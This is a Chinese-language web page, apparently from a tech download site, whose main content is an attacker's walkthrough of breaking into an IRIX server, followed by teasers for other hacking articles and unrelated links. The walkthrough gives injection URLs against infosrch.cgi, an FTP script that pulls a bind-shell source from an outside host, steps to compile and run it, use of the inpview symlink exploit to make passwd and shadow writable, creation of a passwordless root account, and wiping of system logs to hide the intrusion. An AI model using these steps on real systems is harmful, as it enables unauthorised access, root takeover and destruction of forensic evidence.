利用IRIX的inpview漏洞获取权限的方法
1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干活,还是要弄出一个shell有个$来得方便些,于是就用ftp。
2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo open www.xfocus.org>/tmp/a…………上面这些其实就是把这一段东西输进/tmp/a中:
open www.xfocus.org <---------别当真,这里没有这个东西;)user quack quack <---------我的用户名密码binarycd /home/quacklcd /tmppromptget bindshell.c <---------这是一个绑定shell的东西,网上到处有bye
http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup ftp -ivn这里呢,就是在运行ftp取回东西了;)这么拿文件的话在xferlog里不会有记录。
http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc /tmp/bindshell.c -o /tmp/abc
编译
http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc
运行……
3、现在我们可以telnet上去了
bash# telnet *.*.*.* 12345Trying *.*.*.*...Connected to *.*.*.*.Escape character is ’^]’.sh -i;$Content$nbsp;id;uid=60001(nobody) gid=60001(nobody)$
4、利用IRIX的inpview漏洞,该漏洞的描述如下:
某些版本IRIX下的inpview会在/var/tmp/目录下不安全地建立临时文件,这些临时文件名并不随机,用户可以建立一个符号链接到其他文件,利用inpview的setuid-to-root权限覆盖其他文件,同时对应文件权限被更改成0666。
漏洞利用程序就不贴了,大家自己看看,很简单的,总之编译完成之后。
$Content$nbsp;./a.out /etc/passwd;
copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net//usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all
looking for temporary file... found!…………
$Content$nbsp;./a.out /etc/shadow;…………
就把这两个破文件的权限都改成0666了,往下该干什么活不用我说了吧……加个uid0的帐号,密码为空,修改系统,删除sulog\weblog\wtmp\utmp里的记录以及把/tmp下面的东西干掉,把passwd和shadow恢复回原样,再touch一下。走人,睡觉。
btw:一句题外话,现在IRIX的telnetd漏洞很猛呀,还好要有irix系统编译exploit,少了些小孩做坏事,还有,那天stardust说还有许多IRIX的lp默认密码为空,我看了一下,的确如此,印象中mixter写了一个小段子专门搜索网上lp空密码帐号的……
电脑文件加密软件哪个好?如何选择合适的电脑文件加密软件?
无论是工作还是生活,电脑已经成为我们每天不可缺少的工具之一。我们也经常会在电脑存储一些重要的私人文件或者是公司的机密文件,这些文件的安全管理就显得十分重要。通过使用一些电脑文件加密软件对电脑文件进
详情2018-01-27 14:25:44责编:llp 来源:驱动管家万能多媒体播放软件:暴风影音的视频程序模块有漏洞
暴风影音是在中国非常流行的万能多媒体播放软件。暴风影音所使用的视频加速程序模块是通过设置浏览器代理实现的,这个代理服务器(HttpServer dll)会在本机开8089端口监听处理请求。因为此端口绑定的地址不是loc
详情2018-01-20 14:05:34责编:llp 来源:驱动管家挖掘鸡配置 挖掘鸡入侵传奇sf图解
图一 选择扫描的URL连接,点了了URL,能下载说明存在数据库,不能下载说明不存在数据库。如图2,说明
详情2018-01-25 10:55:55责编:llp 来源:驱动管家flash安全不可忽略!新浪微博也存在cookies漏洞?
最近突然觉得,很多FLASH开发人员在编写的时候,忽视了安全问题。被恶意利用的话,可以实现URL跳转,COOKIES盗取,甚至是蠕虫攻击。漏洞测试:IE , firefox , chrome(= = 这个输入测试代码,浏览器直接崩溃
详情2018-01-18 09:38:30责编:llp 来源:驱动管家什么是邮件注入?邮件注入的步骤是什么?
一、简介如今,互联网的使用急剧上升,但绝大多数互联网用户没有安全知识背景。大多数的人都会使用互联网通过邮件Email的方式和他人进行通信。出于这个原因,大多数网站允许他们的用户联系他们,向网站提供建议,报
详情2018-03-06 16:20:45责编:llp 来源:驱动管家Linux服务器攻击有哪四种等级?防范嗅探器的攻击有哪些方法?
随着Linux企业应用的扩展,有大量的网络服务器使用Linux操作系统。Linux服务器的安全性能受到越来越多的关注,这里根据Linux服务器受到攻击的深度以级别形式列出,并提出不同的解决方案。对Linux服务器攻击的定义
详情2018-03-04 10:59:44责编:llp 来源:驱动管家两种Microsoft SQL Server执行命令的方法都需要以sa权限为前提
现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能CMD被改了权限,所以我推荐的办法是有能力的同学自己开发DLL,然后把DLL写入到对方计算机中,再注册为存储过程。两种Microsoft SQL
详情2018-01-23 14:50:54责编:llp 来源:驱动管家asp基础教程 怎么判断asp搜索型注入漏洞是否存在?
简单的判断搜索型注入漏洞存在不存在的办法是先搜索& 39;,如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索200
详情2018-02-09 13:29:42责编:llp 来源:驱动管家手把手教你捕获数据包 捕获数据包的方法
前 言经常看到论坛有人问起关于数据包的截获、分析等问题,幸好本人也对此略有所知,也写过很多的sniffer,所以就想写一系列的文章来详细深入的探讨关于数据包的知识。我希望通过这一系列的文章,能使得关于数据
详情2018-01-21 14:33:20责编:llp 来源:驱动管家局域网共享的安全防范技巧 保证局域网共享安全有哪些方法?
随着网络的飞速发展,现在最热的话题自然就是网络安全了。在信息时代里,几乎每个人都面临着安全威胁,都有必要对网络安全方面的知识有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在付
详情2018-01-20 18:00:31责编:llp 来源:驱动管家
- 探测社区管理员的密码 密码探测的方法是什么?
- 在支付宝上怎么补借条?支付宝补借条的方法
- 视频格式转换器哪个最好用?视频格式转换器的介绍
- 使用百度输入法怎么打出特殊符号?具体方法如下
- arc文件格式是什么?怎么在电脑上打开arc格式文件
- 罗技针对Craft键盘Logitech Options更新 追加对Lightroom支持
- 区块链究竟和代币到底有什么关系?
- 怎么在自己电脑上创建一个别人无法删除的文件夹
- 电脑在上传东西的时候速度很慢怎么提升上传速度
- 锤子t2支不支持nfc功能?(附什么是nfc)
- 360手机n6有nfc功能吗?360 n6 Pro呢?
- 怎么购买笔记本?购买笔记本的21个最简单的傻瓜步骤
- 电脑打开Word一直未响应是怎么回事?要如何解决
- 用regedt32.exe对sam键设置完全控制权限
- 黑客入侵的七大隐患是什么?如何躲避黑客?
- 台式机怎么安装usb无线网卡驱动 TP-Link无线网卡驱动的安装方法
- 删除Windows7旧的或者未使用设备驱动 提高稳定性
- 几何画板画圆柱体的的两种动画制作方法
- word2016想要删除表格且保留内容怎么操作
- GT1030怎么样 值得买吗?GT1030首发评测